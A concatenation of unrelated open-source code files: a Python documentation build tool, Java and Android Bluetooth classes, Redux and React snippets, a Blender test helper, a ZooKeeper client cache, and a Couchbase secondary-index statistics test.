for x, (buildcode, source) in enumerate(results, 1):
if buildcode:
logger.info("success (%d of %d) available in %s",
x, len(results), source.working.dirname)
else:
logger.info("FAILURE (%d of %d) available in %s",
x, len(results), source.working.dirname)
if buildsuccess:
return os.EX_OK
else:
return "Build failed, see logging output in %s." % (config.builddir,)
def publish(config, docs, **kwargs):
config.build = True
result = build(config, docs, **kwargs)
if result != os.EX_OK:
return result
for x, source in enumerate(docs, 1):
logger.info("Publishing (%d of %d) to %s.",
x, len(docs), source.output.dirname)
# -- swapdirs must raise an error if there are problems
#
swapdirs(source.working.dirname, source.output.dirname)
if os.path.isdir(source.working.dirname):
logger.debug("%s removing old directory %s",
source.stem, source.working.dirname)
shutil.rmtree(source.working.dirname)
workingdirs = list(set([x.dtworkingdir for x in docs]))
workingdirs.append(config.builddir)
post_publish_cleanup(workingdirs)
return os.EX_OK
def getDocumentNames(args):
sought = list()
for arg in args:
doc = arg_issourcedoc(arg)
if doc is not None:
sought.append(doc)
else:
sought.append(None)
remainder = set([y for x, y in zip(sought, args) if not x])
sought = set(filter(None, sought))
return sought, remainder
def getStatusNames(args):
found = set()
sought = set()
for arg in args:
stati = status_classes.get(arg, None)
if stati:
sought.update(stati)
found.add(arg)
remainder = set(args).difference(found)
return sought, remainder
def getDocumentClasses(args):
largs = [x.lower() for x in args]
sought = list()
for cls in knowndoctypes:
if cls.__name__.lower() in largs:
sought.append(cls)
else:
sought.append(None)
remainder = set([y for x, y in zip(sought, args) if not x])
sought = set(filter(None, sought))
return sought, remainder
def getDocumentsByStems(docs, args):
sought = set()
for doc in docs:
if doc.stem in args:
sought.add(doc)
soughtstems = [x.stem for x in sought]
remainder = set(args).difference(soughtstems)
return sought, remainder
def getDocumentsByStatus(docs, stati):
sought = set()
for doc in docs:
if doc.status in stati:
sought.add(doc)
return sought
def processSkips(config, docs):
included = set()
excluded = set()
skip_stati, remainder = getStatusNames(config.skip)
skip_doctypes, skip_stems = getDocumentClasses(remainder)
for doc in docs:
stem = doc.stem
if hasattr(doc, 'doctype'):
if doc.doctype in skip_doctypes:
logger.info("%s skipping doctype %s", stem, doc.doctype)
excluded.add(doc)
continue
if doc.status in skip_stati:
logger.info("%s skipping status %s", stem, doc.status)
excluded.add(doc)
continue
if doc.stem in skip_stems:
logger.info("%s skipping stem %s", stem, stem)
excluded.add(doc)
continue
included.add(doc)
return included, excluded
def extractExplicitDocumentArgs(config, args):
docs = set()
rawdocs, remainder = getDocumentNames(args)
logger.debug("args included %d documents in filesystem: %r",
len(rawdocs), rawdocs)
for doc in rawdocs:
docs.add(SourceDocument(doc))
return docs, remainder
def collectWorkset(config, args):
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# -- argument handling logic; try to avoid creating an inventory unless it
# is necessary
#
workset, remainder = extractExplicitDocumentArgs(config, args)
stati, remainder = getStatusNames(remainder)
if len(workset):
logger.info("Added %d explicit file paths from args.", len(workset))
need_inventory = False
if remainder or stati:
need_inventory = True
if not workset:
need_inventory = True
# -- We only --list, --script, --build, or --publish on work-to-be-done
# so, if there have been no special arguments at this point, we will
# simply grab the work to be done; see below the line that says:
#
# docs = inv.work.values()
#
# -- also make one last check to see that config.pubdir and
# config.sourcedir are set appropriately; just before creating an
# Inventory
#
if need_inventory:
if not config.pubdir:
return None, ERR_NEEDPUBDIR + "for inventory"
if not config.sourcedir:
return None, ERR_NEEDSOURCEDIR + "for inventory"
inv = Inventory(config.pubdir, config.sourcedir)
logger.info("Inventory contains %s source and %s output documents.",
len(inv.source.keys()), len(inv.output.keys()))
else:
inv = None
if stati:
docs = getDocumentsByStatus(inv.all.values(), stati)
workset.update(docs)
if docs:
logger.info("Added %d docs, found by status class .", len(docs))
unknownargs = None
if remainder:
docs, unknownargs = getDocumentsByStems(inv.all.values(), remainder)
workset.update(docs)
logger.info("Added %d docs, found by stem name.", len(docs))
if unknownargs:
return None, ERR_UNKNOWNARGS + ' '.join(unknownargs)
# -- without any arguments (no files, no stems, no status_classes), the
# default behaviour is to either --build, --list or --script any
# available work, i.e. documents that have status new, orphan, broken,
# or stale.
#
if not workset:
if not stati and not remainder:
workset.update(inv.work.values())
# -- and, of course, apply the skipping logic
#
workset, _ = processSkips(config, workset)
docs = sorted(workset, key=lambda x: x.stem.lower())
return docs, None
def handleArgs(config, args):
if config.doctypes:
return show_doctypes(config, *args)
if config.statustypes:
return show_statustypes(config, *args)
if config.summary:
return summary(config, *args)
docs, error = collectWorkset(config, args)
if error:
return error
if not docs:
logger.info("No work to do.")
return os.EX_OK
if config.detail:
return detail(config, docs)
# -- build(), script() and publish() will not be able to deal
# with orphans or with unknown source document types
#
docs = removeUnknownDoctypes(removeOrphans(docs))
if config.script:
return script(config, docs)
if config.publish:
return publish(config, docs)
if not config.build:
logger.info("Assuming --build, since no other action was specified...")
config.build = True
if config.build:
return build(config, docs)
return "Fell through handleArgs(); programming error."
def run(argv):
# -- may want to see option parsing, so set --loglevel as
# soon as possible
if '--loglevel' in argv:
levelarg = 1 + argv.index('--loglevel')
level = arg_isloglevel(argv[levelarg])
# -- set the root logger's level
logging.getLogger().setLevel(level)
# -- produce a configuration from CLI, ENV and CFG
#
tag = 'ldptool'
config, args = collectconfiguration(tag, argv)
# -- and reset the loglevel (after reading envar, and config)
#
logging.getLogger().setLevel(config.loglevel)
logger.debug("Received the following configuration:")
for param, value in sorted(vars(config).items()):
logger.debug(" %s = %r", param, value)
logger.debug(" args: %r", args)
return handleArgs(config, args)
def main():
sys.exit(run(sys.argv[1:]))
if __name__ == '__main__':
main()
#
# -- end of file
|
yassineazimani/SnapAds4J
|
src/main/java/snapads4j/model/device/Device.java
|
<reponame>yassineazimani/SnapAds4J
/*
* Copyright 2019 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package snapads4j.model.device;
import com.fasterxml.jackson.annotation.JsonInclude;
import com.fasterxml.jackson.annotation.JsonInclude.Include;
import com.fasterxml.jackson.annotation.JsonProperty;
import lombok.Getter;
import lombok.Setter;
import lombok.ToString;
import java.util.List;
/**
* Device.
*
* @author Yassine
*/
@Getter
@Setter
@ToString
@JsonInclude(Include.NON_EMPTY)
public class Device {
/**
* Id
*/
private Long id;
/**
* Connection Type
*/
@JsonProperty("connection_type")
private String connectionType;
/**
* OS Type
*/
@JsonProperty("os_type")
private String osType;
/**
* OS Version
*/
@JsonProperty("os_version")
private Double osVersion;
/**
* OS min Version
*/
@JsonProperty("os_version_min")
private Double osMinVersion;
/**
* OS max Version
*/
@JsonProperty("os_version_max")
private Double osMaxVersion;
/**
* Carrier IDs
*/
@JsonProperty("carrier_id")
private List<String> carrierIds;
/**
* Marketing names
*/
@JsonProperty("marketing_name")
private List<String> marketingNames;
/**
* Used to build Device instance (${@link Device})
*
* @author Yassine
*/
public static class Builder {
private final Device deviceInstance;
public Builder() {
this.deviceInstance = new Device();
} // Builder()
/**
* Set ID
*
* @param id
* @return
*/
public Builder setId(Long id) {
this.deviceInstance.setId(id);
return this;
} // setId()
/**
* Example : "WIFI" or "CELL"
*
* @param connectionType
* @return
*/
public Builder setConnectionType(String connectionType) {
this.deviceInstance.setConnectionType(connectionType);
return this;
} // setConnectionType()
/**
* Example : "ANDROID" or "iOS"
*
* @param osType
* @return
*/
public Builder setOSType(String osType) {
this.deviceInstance.setOsType(osType);
return this;
} // setOSType()
/**
* Example : 10.3.2
*
* @param osVersion
* @return
*/
public Builder setOSVersion(Double osVersion) {
this.deviceInstance.setOsVersion(osVersion);
return this;
} // setOSVersion()
/**
* Example : 10.3.2
*
* @param osVersion
* @return
*/
public Builder setOSMinVersion(Double osVersion) {
this.deviceInstance.setOsMinVersion(osVersion);
return this;
} // setOSMinVersion()
/**
* Example : 10.3.2
*
* @param osVersion
* @return
*/
public Builder setOSMaxVersion(Double osVersion) {
this.deviceInstance.setOsMaxVersion(osVersion);
return this;
} // setOSMaxVersion()
/**
* Example : "US_ATT"
*
* @param carrierIds
* @return
*/
public Builder setCarrierId(List<String> carrierIds) {
this.deviceInstance.setCarrierIds(carrierIds);
return this;
} // setCarrierId()
/**
* Example : "Apple/iPhone 7 Plus/", "Apple/iPhone 6s Plus/"
*
* @param marketingNames
* @return
*/
public Builder setMake(List<String> marketingNames) {
this.deviceInstance.setMarketingNames(marketingNames);
return this;
} // setMake()
public Device build() {
return this.deviceInstance;
} // build()
} // Builder
} // Device
|
MichaelC23/Headlines
|
src/feed/redux/actions.js
|
<gh_stars>0
/**
* Feed actions.
* @module src/feed/redux/actions
*/
import {
UPDATE_FEED,
SET_CATEGORY,
SET_LOADING,
FETCH_FEED,
} from 'src/feed/constants';
/**
* Update feed action.
* @function updateFeed
* @param {Object} body raw json feed.
* @returns {Object} update feed action.
*/
export function updateFeed(body) {
return {
type: UPDATE_FEED,
body,
};
}
/**
* Fetches feed
* @function fetchFeed
* @param {Bool} value for loading.
* @returns {Object} fetch feed action.
*/
export function fetchFeed(loading) {
return {
type: FETCH_FEED,
body: {
loading,
},
};
}
/**
* Set the feed category
* @function setCategory
* @param {String} category the name.
* @returns {Object} set category action.
*/
export function setCategory(category) {
return {
type: SET_CATEGORY,
body: {
category,
},
};
}
/**
* Set loading flag
* @function setLoading
* @param {Bool} value for loading.
* @returns {Object} set loading action.
*/
export function setLoading(loading) {
return {
type: SET_LOADING,
body: {
loading,
},
};
}
|
ZtModArchive/blender_niftools_addon
|
testframework/integration/modules/object/b_gen_object.py
|
<gh_stars>10-100
"""Helper functions to create and test Blender scene geometry data"""
# ***** BEGIN LICENSE BLOCK *****
#
# Copyright © 2005, NIF File Format Library and Tools contributors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the NIF File Format Library and Tools
# project nor the names of its contributors may be used to endorse
# or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# ***** END LICENSE BLOCK *****
import bpy
from math import radians, degrees
import mathutils
import nose
EPSILON = 0.005
E_VEC = mathutils.Vector((EPSILON, EPSILON, EPSILON))
ZERO = mathutils.Vector((0.0, 0.0, 0.0))
RAD_30 = radians(30.0)
RAD_60 = radians(60.0)
RAD_90 = radians(90.0)
def b_create_transformed_object(b_name):
"""Create and return a single blender object."""
b_obj = b_create_empty_object(b_name)
b_apply_transform_object(b_obj)
return b_obj
def b_create_empty_object(b_name):
"""Creates empty object"""
bpy.ops.object.add(type='EMPTY')
b_obj = bpy.data.objects[bpy.context.active_object.name]
b_obj.name = b_name
return b_obj
def b_apply_transform_object(b_obj):
"""Applies scaling, rotation, translation"""
b_obj.rotation_euler = b_rot_mat().to_euler()
b_obj.location = b_translation_mat().to_translation()
b_obj.scale = b_scale_mat().to_scale()
def b_translation_mat():
# translation
return mathutils.Matrix.Translation((20, 20, 20))
def b_scale_mat():
# scale
return mathutils.Matrix.Scale(0.75, 4)
def b_rot_mat():
"""Return a non-trivial transform matrix."""
b_rot_mat_x = mathutils.Matrix.Rotation(RAD_30, 4, 'X')
b_rot_mat_y = mathutils.Matrix.Rotation(RAD_60, 4, 'Y')
b_rot_mat_z = mathutils.Matrix.Rotation(RAD_90, 4, 'Z')
return b_rot_mat_z * b_rot_mat_y * b_rot_mat_x
def b_check_transform(b_obj):
b_check_matrix_local(b_obj)
b_check_user_transforms(b_obj)
def b_check_user_transforms(b_obj):
print(f"b_obj.location - {b_obj.location})"
nose.tools.assert_equal(b_obj.location, b_translation_mat().to_translation()) # location
print(f"b_obj.scale - {b_obj.scale})"
nose.tools.assert_equal((b_obj.scale - b_scale_mat().to_scale()) < E_VEC, True) # uniform scale
b_rot_eul = b_obj.rotation_euler
print(f"b_rot_eul - {b_rot_eul})"
b_rot_axis = (degrees(b_rot_eul.x), degrees(b_rot_eul.y), degrees(b_rot_eul.z))
print(f"b_rot_eul(x,y,z) - {b_rot_axis})"
nose.tools.assert_equal((b_rot_eul.x - RAD_30) < EPSILON, True) # x rotation
nose.tools.assert_equal((b_rot_eul.y - RAD_60) < EPSILON, True) # y rotation
nose.tools.assert_equal((b_rot_eul.z - RAD_90) < EPSILON, True) # z rotation
def b_check_matrix_local(b_obj):
b_loc_vec, b_rot_quat, b_scale_vec = b_obj.matrix_local.decompose() # transforms
print(f"b_loc_vec - {b_loc_vec})"
nose.tools.assert_equal(b_loc_vec, b_translation_mat().to_translation()) # location
print(f"b_scale_vec - {b_scale_vec})"
nose.tools.assert_equal((b_scale_vec - b_scale_mat().to_scale()) < E_VEC, True) # uniform scale
b_rot_eul = b_rot_quat.to_euler()
print(f"b_rot_eul - {b_rot_eul})"
b_rot_axis = (degrees(b_rot_eul.x), degrees(b_rot_eul.y), degrees(b_rot_eul.z))
print(f"b_rot_eul(x,y,z) - {b_rot_axis})"
nose.tools.assert_equal((b_rot_eul.x - RAD_30) < EPSILON, True) # x rotation
nose.tools.assert_equal((b_rot_eul.y - RAD_60) < EPSILON, True) # y rotation
nose.tools.assert_equal((b_rot_eul.z - RAD_90) < EPSILON, True) # z rotation
|
REINER-Kartengeraete/REINER_SCT_Bluetooth_LE_Android
|
reiner_ccid_via_dk_sample/app/src/main/java/userinterface/BluetoothReaderSelection.java
|
<filename>reiner_ccid_via_dk_sample/app/src/main/java/userinterface/BluetoothReaderSelection.java
/*
*
*
*
* Created by <NAME> on 5.5.2015.
* Copyright (c) 2015 REINER SCT. All rights reserved.
*
* Version: 0.5.3
* Date: 17.02.2017
* Autor: <NAME>
* eMail: <EMAIL>
*/
package userinterface;
import java.util.List;
import java.util.Set;
import secode3.SecoderBluetoothReader;
import secode3.SecoderReaderCallbacks;
import secodeInfo.SecoderInfoData;
import utilitis.*;
import bluetooth.BluetoothConnectionState;
import bluetooth.BluetoothErrors;
import bluetooth.Bluetooth_ReaderInfo;
import com.example.reiner_ccid_via_dk_sample.R;
import android.app.Activity;
import android.app.AlertDialog;
import android.bluetooth.BluetoothDevice;
import android.bluetooth.BluetoothManager;
import android.content.Context;
import android.content.DialogInterface;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.preference.PreferenceManager;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.AdapterView;
import android.widget.AdapterView.OnItemClickListener;
import android.widget.Button;
import android.widget.ListView;
import android.widget.ProgressBar;
import android.widget.TextView;
// TODO: Auto-generated Javadoc
/**
* The Class BluetoothReaderSelection.
*/
public class BluetoothReaderSelection extends Activity {
/** The _bluetooth service. */
private SecoderBluetoothReader _bluetoothService;
/** The found devices. */
private ListView foundDevices;
/** The known devices. */
private ListView knownDevices;
/** The scan button. */
private Button scanButton;
/** The spinner. */
private ProgressBar spinner;
/** The m array adapter. */
private BluetoothReaderInfoAdapter mArrayAdapter;
/** The foundreaders. */
private SetList<Bluetooth_ReaderInfo> foundreaders = new SetList<Bluetooth_ReaderInfo>();
/** The knownreaders. */
private SetList<Bluetooth_ReaderInfo> knownreaders = new SetList<Bluetooth_ReaderInfo>();
/** The deviceto bond posittion. */
private int devicetoBondPosittion = 0;
/** The used reader text view. */
private TextView usedReaderTextView;
/* (non-Javadoc)
* @see android.app.Activity#onCreate(android.os.Bundle)
*/
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.reader_selection);
foundDevices = (ListView) findViewById(R.id.listViewFoundDevices);
knownDevices = (ListView) findViewById(R.id.listViewKnownDevices);
scanButton = (Button) findViewById(R.id.scanButton);
spinner = (ProgressBar) findViewById(R.id.spinnerProgress);
spinner.setVisibility(View.INVISIBLE);
usedReaderTextView = (TextView) findViewById(R.id.textViewUsedReader);
//foundreaders.add(new Bluetooth_ReaderInfo());
knownreaders.add(new Bluetooth_ReaderInfo());
updateKnownReaders();
scanButton.setOnClickListener(listener);
scanButton.setEnabled(false);
LoadDefaultReader();
initBluetoothReader();
}
/** The listener. */
OnClickListener listener = new OnClickListener() {
@Override
public void onClick(View v) {
spinner.setVisibility(View.VISIBLE);
_bluetoothService.scanReaders(9999999);
}
};
/**
* Inits the bluetooth reader.
*/
private void initBluetoothReader() {
_bluetoothService = new SecoderBluetoothReader(secoderCallbacks,
getApplicationContext());
}
/**
* Load bonded bluetooth devices.
*/
private void LoadBondedBluetoothDevices() {
knownreaders.clear();
final BluetoothManager bluetoothManager = (BluetoothManager) getSystemService(Context.BLUETOOTH_SERVICE);
Set<BluetoothDevice> pairedDevices = null;
pairedDevices = bluetoothManager.getAdapter().getBondedDevices();
// If there are paired devices
if (pairedDevices.size() > 0) {
// Loop through paired devices
for (BluetoothDevice device : pairedDevices) {
knownreaders.add(new Bluetooth_ReaderInfo(device.getName(), device.getAddress(), true));
}
}
if (knownreaders.size() <= 0)
knownreaders.add(new Bluetooth_ReaderInfo());
}
/**
* Update known readers.
*/
private synchronized void updateKnownReaders() {
LoadBondedBluetoothDevices();
mArrayAdapter = new BluetoothReaderInfoAdapter(this, knownreaders);
knownDevices.setAdapter(mArrayAdapter);
knownDevices.setOnItemClickListener(tableClickListener2);
}
/**
* Update found readers.
*/
private synchronized void updateFoundReaders() {
if(mArrayAdapter != null) mArrayAdapter.clear();
mArrayAdapter = new BluetoothReaderInfoAdapter(this, foundreaders);
foundDevices.setAdapter(mArrayAdapter);
foundDevices.setOnItemClickListener(tableClickListener);
}
/** The table click listener. */
private OnItemClickListener tableClickListener = new OnItemClickListener() {
@Override
public void onItemClick(AdapterView<?> parent, View view, int position,long id) {
if (parent == foundDevices) {
devicetoBondPosittion = position;
if(_bluetoothService.getBluetoothConnectionState() == BluetoothConnectionState.Scanning){
_bluetoothService.stopScaning();
}
else
{
startBonding();
}
}
}
};
/** The table click listener2. */
private OnItemClickListener tableClickListener2 = new OnItemClickListener() {
@Override
public void onItemClick(AdapterView<?> parent, View view, int position,long id) {
if (parent == knownDevices) {
Bluetooth_ReaderInfo reader = knownreaders.get(position);
saveDefaultReader(reader);
}
}
};
/**
* Start bonding.
*/
private synchronized void startBonding()
{
Bluetooth_ReaderInfo reader = foundreaders.get(devicetoBondPosittion);
_bluetoothService.bondReader(reader.getReaderID());
}
/**
* Save default reader.
*
* @param info the info
*/
private void saveDefaultReader(Bluetooth_ReaderInfo info) {
usedReaderTextView.setText("Used Reader:" + info.getReaderName());
SharedPreferences preferences = PreferenceManager
.getDefaultSharedPreferences(this);
SharedPreferences.Editor preferencesEditor = preferences.edit();
preferencesEditor.putString("RSCTActiveBluetoothDeviceName",
info.getReaderName());
preferencesEditor.putString("RSCTActiveBluetoothDeviceId",
info.getReaderID());
preferencesEditor.commit();
}
/**
* Load default reader.
*
* @return the bluetooth_ reader info
*/
private Bluetooth_ReaderInfo LoadDefaultReader() {
Bluetooth_ReaderInfo info = new Bluetooth_ReaderInfo();
SharedPreferences preferences = PreferenceManager.getDefaultSharedPreferences(this);
info.setReaderName(preferences.getString("RSCTActiveBluetoothDeviceName", "no reader found"));
info.setReaderID(preferences.getString("RSCTActiveBluetoothDeviceId",""));
usedReaderTextView.setText("Used Reader:" + info.getReaderName());
return info;
}
/**
* Load default reader.
*
* @param ctx the ctx
* @return the bluetooth_ reader info
*/
public static Bluetooth_ReaderInfo LoadDefaultReader(Context ctx) {
Bluetooth_ReaderInfo info = new Bluetooth_ReaderInfo();
SharedPreferences preferences = PreferenceManager.getDefaultSharedPreferences(ctx);
info.setReaderName(preferences.getString("RSCTActiveBluetoothDeviceName", "no reader found"));
info.setReaderID(preferences.getString("RSCTActiveBluetoothDeviceId",""));
return info;
}
/**
* Show device selected dialog.
*
* @param info the info
*/
private void showDeviceSelectedDialog( Bluetooth_ReaderInfo info)
{
try {
AlertDialog.Builder builder = null;
builder = new AlertDialog.Builder(this);
builder.setMessage("You selected the Device "+ info.getReaderName() + ".\nMake Sure the device is Bond in the Android bluetooth menu!").setTitle("Choosen Reader");
builder.setPositiveButton("OK",new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
finish();
}
});
AlertDialog dialog = builder.create();
dialog.show();
} catch (Exception e) {
e.printStackTrace();
}
}
/** The secoder callbacks. */
private SecoderReaderCallbacks secoderCallbacks = new SecoderReaderCallbacks() {
@Override
public void didRecieveApdu(String answer) {
}
@Override
public void didRecieveSecoderInfo(SecoderInfoData info) {
}
@Override
public void didRecieveResponseError(BluetoothErrors errorMessage,
String respCode) {
}
@Override
public void didFindReaders(List<Bluetooth_ReaderInfo> devices) {
foundreaders.addAll(devices);
updateFoundReaders();
}
@Override
public void onScanningFinished() {
spinner.setVisibility(View.INVISIBLE);
startBonding();
}
@Override
public void disconnected() {
// TODO Auto-generated method stub
}
@Override
public void initiated() {
scanButton.setEnabled(true);
}
@Override
public void Bonded(Bluetooth_ReaderInfo info) {
saveDefaultReader(info);
showDeviceSelectedDialog(info);
}
@Override
public void readyToSend() {
// TODO Auto-generated method stub
}
};
}
|
tienthanh108/thanhnt
|
src/routes/News/containers/News.js
|
<reponame>tienthanh108/thanhnt
import { connect } from 'react-redux'
import News from '../components/News'
export const mapStateToProps = () => ({
})
export const mapDispatchToProps = {
}
export default connect(mapStateToProps, mapDispatchToProps)(News)
|
fantasticmao/grpc-java-kit
|
grpc-kit-kernel/src/main/java/cn/fantasticmao/grpckit/nameresolver/zookeeper/ZkClientHolder.java
|
package cn.fantasticmao.grpckit.nameresolver.zookeeper;
import org.apache.curator.framework.CuratorFramework;
import org.apache.curator.framework.CuratorFrameworkFactory;
import org.apache.curator.framework.imps.CuratorFrameworkState;
import org.apache.curator.retry.ExponentialBackoffRetry;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.concurrent.ConcurrentHashMap;
/**
* Hold connections to the ZooKeeper server.
*
* @author fantasticmao
* @version 1.39.0
* @see <a href="https://zookeeper.apache.org/">Apache ZooKeeper</a>
* @since 2022-03-22
*/
class ZkClientHolder {
private static final Logger LOGGER = LoggerFactory.getLogger(ZkClientHolder.class);
private static final String PATH_ROOT = "grpc-java";
private static final ConcurrentHashMap<String, CuratorFramework> CLIENT_CACHE = new ConcurrentHashMap<>();
public static CuratorFramework get(String connectString) {
if (!CLIENT_CACHE.containsKey(connectString)) {
synchronized (ZkClientHolder.class) {
if (!CLIENT_CACHE.containsKey(connectString)) {
CuratorFramework client = CuratorFrameworkFactory.builder()
.namespace(PATH_ROOT)
.connectString(connectString)
.retryPolicy(new ExponentialBackoffRetry(5_000, 3))
.sessionTimeoutMs(15_000)
.build();
client.start();
CLIENT_CACHE.put(connectString, client);
}
}
}
return CLIENT_CACHE.get(connectString);
}
static {
Runtime.getRuntime().addShutdownHook(new Thread(() ->
CLIENT_CACHE.forEach((connectString, client) -> {
if (CuratorFrameworkState.STARTED == client.getState()) {
LOGGER.debug("Close ZooKeeper connection for connection string: {}", connectString);
client.close();
}
})
));
}
}
|
couchbaselabs/testrunner-bharath
|
pytests/gsi/index_config_stats_gsi.py
|
<reponame>couchbaselabs/testrunner-bharath
from .base_gsi import BaseSecondaryIndexingTests
from remote.remote_util import RemoteMachineShellConnection
from membase.api.rest_client import RestConnection, RestHelper
from pytests.query_tests_helper import QueryHelperTests
import time
class SecondaryIndexingStatsConfigTests(BaseSecondaryIndexingTests, QueryHelperTests):
def setUp(self):
super(SecondaryIndexingStatsConfigTests, self).setUp()
self.flush_bucket = self.input.param('flush_bucket', False)
self.move_index = self.input.param('move_index', False)
def suite_setUp(self):
pass
def tearDown(self):
super(SecondaryIndexingStatsConfigTests, self).tearDown()
def suite_tearDown(self):
pass
def test_key_size_distribution(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
doc = {"indexer.statsPersistenceInterval": 60}
rest.set_index_settings_internal(doc)
string_70 = "x" * 70
string_260 = "x" * 260
string_1030 = "x" * 1030
string_5000 = "x" * 5000
string_103000 = "x" * 103000
insert_query1 = 'INSERT INTO default (KEY, VALUE) VALUES ("id1", { "name" : "%s" })' % string_70
insert_query2 = 'INSERT INTO default (KEY, VALUE) VALUES ("id2", { "name" : "%s" })' % string_260
insert_query3 = 'INSERT INTO default (KEY, VALUE) VALUES ("id3", { "name" : "%s" })' % string_1030
insert_query4 = 'INSERT INTO default (KEY, VALUE) VALUES ("id4", { "name" : "%s" })' % string_5000
insert_query5 = 'INSERT INTO default (KEY, VALUE) VALUES ("id5", { "name" : "%s" })' % string_103000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query4,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query5,
server=self.n1ql_node)
insert_query1 = 'INSERT INTO standard_bucket0 (KEY, VALUE) VALUES ("id4", { "name" : "%s" })' % string_5000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
create_index_query1 = "CREATE INDEX idx ON default(name) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(join_mo) USING GSI"
create_index_query3 = "CREATE INDEX idx ON standard_bucket0(name) USING GSI"
create_index_query4 = "CREATE INDEX idx2 ON standard_bucket0(join_mo) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query4,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
expected_distr = []
expected_distr2 = []
common_distr = "{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
expected_distr.append("{u'(0-64)': 2016, u'(257-1024)': 1, u'(65-256)': 1, u'(4097-102400)': 1, u'(1025-4096)': 1, u'(102401-max)': 1}")
expected_distr.append(common_distr)
expected_distr2.append("{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 1, u'(1025-4096)': 0, u'(102401-max)': 0}")
expected_distr2.append(common_distr)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr)
self.verify_key_size(index_map, 'standard_bucket0', expected_distr2)
self.sleep(60)
shell = RemoteMachineShellConnection(index_node)
output1, error1 = shell.execute_command("killall -9 indexer")
self.sleep(30)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr)
self.verify_key_size(index_map, 'standard_bucket0', expected_distr2)
def test_key_size_distribution_nulls(self):
string_70 = "x" * 70
string_103000 = "x" * 103000
insert_query1 = 'INSERT INTO default (KEY, VALUE) VALUES ("id1", { "name" : "%s" })' % string_70
insert_query2 = 'INSERT INTO default (KEY, VALUE) VALUES ("id2", { "name" : NULL })'
insert_query3 = 'INSERT INTO default (KEY, VALUE) VALUES ("id3", { "name" : ""})'
insert_query5 = 'INSERT INTO default (KEY, VALUE) VALUES ("id5", { "name" : "%s" })' % string_103000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query5,
server=self.n1ql_node)
create_index_query1 = "CREATE INDEX idx ON default(name) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(join_mo) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
expected_distr = []
common_distr = "{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
expected_distr.append("{u'(0-64)': 2018, u'(257-1024)': 0, u'(65-256)': 1, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 1}")
